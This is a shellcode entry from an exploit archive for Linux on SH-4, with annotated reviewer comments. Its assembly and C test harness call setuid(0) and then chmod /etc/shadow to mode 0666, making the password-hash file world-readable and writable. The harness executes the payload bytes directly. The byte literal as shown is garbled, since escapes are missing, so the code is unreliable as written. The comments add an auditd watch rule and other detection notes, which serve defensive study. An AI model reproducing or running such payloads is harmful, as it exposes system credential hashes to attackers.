# Title : Linux/SuperH - sh4 - setuid(0) - chmod("/etc/shadow", 0666) - exit(0) - 43 bytes
# Published : 2011-06-22
# Author :
/*
** Title: Linux/SuperH - sh4 - setuid(0) - chmod("/etc/shadow", 0666) - exit(0) - 43 bytes
** Date: 2011-06-22
** Tested on: Debian-sh4 2.6.32-5-sh7751r
** Author: Jonathan Salwan - twitter: @jonathansalwan
**
** http://shell-storm.org
**
**
** seteuid:
** mov #23, r3
** xor r4, r4
** trapa #2
** chmod:
** mov #15, r3
** mova @(24, pc), r0
** mov r0, r4
** mov #87, r8
** mov #5, r9
** mul.l r8, r9
** sts macl, r5
** add #3, r5
** trapa #2
** exit:
** xor r3, r3
** mov #1, r3
** xor r4, r4
** trapa #2
** file:
** .string "/etc/shadow"
**
*/
#include <stdio.h>
#include <string.h>
/*
 * SC: the payload bytes for the assembly listed in the header comment.
 *
 * NOTE(review): as this page renders it, the literal holds plain 'x'
 * characters in 43 three-character groups ("x17", "xe3", ...). The original
 * listing presumably used backslash-escaped hex bytes, which would give the
 * 43 bytes stated in the title; in the form shown here the string is ASCII
 * text, not SH-4 machine code.
 *
 * Reading aid, grounded in the header listing:
 *   - syscall 23 with r4 = 0 (titled setuid(0); the label says seteuid),
 *   - syscall 15 (chmod) on the path stored after the code, with the mode
 *     built arithmetically as 87 * 5 + 3 = 438 = 0666 rather than loaded as
 *     a constant,
 *   - syscall 1 (exit) with status 0.
 *
 * The last 11 groups (2f 65 74 63 2f 73 68 61 64 6f 77) are the ASCII path
 * "/etc/shadow", stored in clear, so the path is a usable static string
 * indicator even though the mode constant is not.
 *
 * Impact depends on the process that runs these bytes: setuid(0) and a
 * chmod of /etc/shadow only succeed when that process already has the
 * privilege for them (root, a set-uid-root program, or the matching
 * capabilities). An audit watch on write/attribute changes to the file
 * (auditd: -w /etc/shadow -p wa) or file-integrity monitoring records the
 * resulting mode change.
 */
char *SC = "x17xe3x4ax24x02xc3x0fxe3x05xc7x03"
"x64x57xe8x05xe9x87x09x1ax05x03x75"
"x02xc3x3ax23x01xe3x4ax24x02xc3x2f"
"x65x74x63x2fx73x68x61x64x6fx77";
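/*
 * Test harness: print the length of SC, then transfer control to it.
 *
 * Returns 0 if control comes back from the call. The listing in the file
 * header ends in an exit syscall, so with the intended payload the return
 * statement is not expected to be reached.
 */
int main(void)
{
    /*
     * strlen() returns size_t, so the matching conversion is %zu; passing it
     * to %d is undefined behaviour where size_t and int differ in width.
     * The trailing "n" in the page's format string is read as a newline
     * escape that lost its backslash. strlen() stops at the first zero
     * byte, so the figure is only the payload size when the payload holds
     * no zero bytes.
     */
    fprintf(stdout, "Length: %zu\n", strlen(SC));

    /*
     * Reinterpret the data pointer as a function pointer and call it.
     * SC points at a string literal, so this depends on that storage being
     * mapped executable; where data pages are non-executable (NX / W^X) the
     * call faults instead of running the bytes.
     */
    (*(void(*)()) SC)();

    return 0;
}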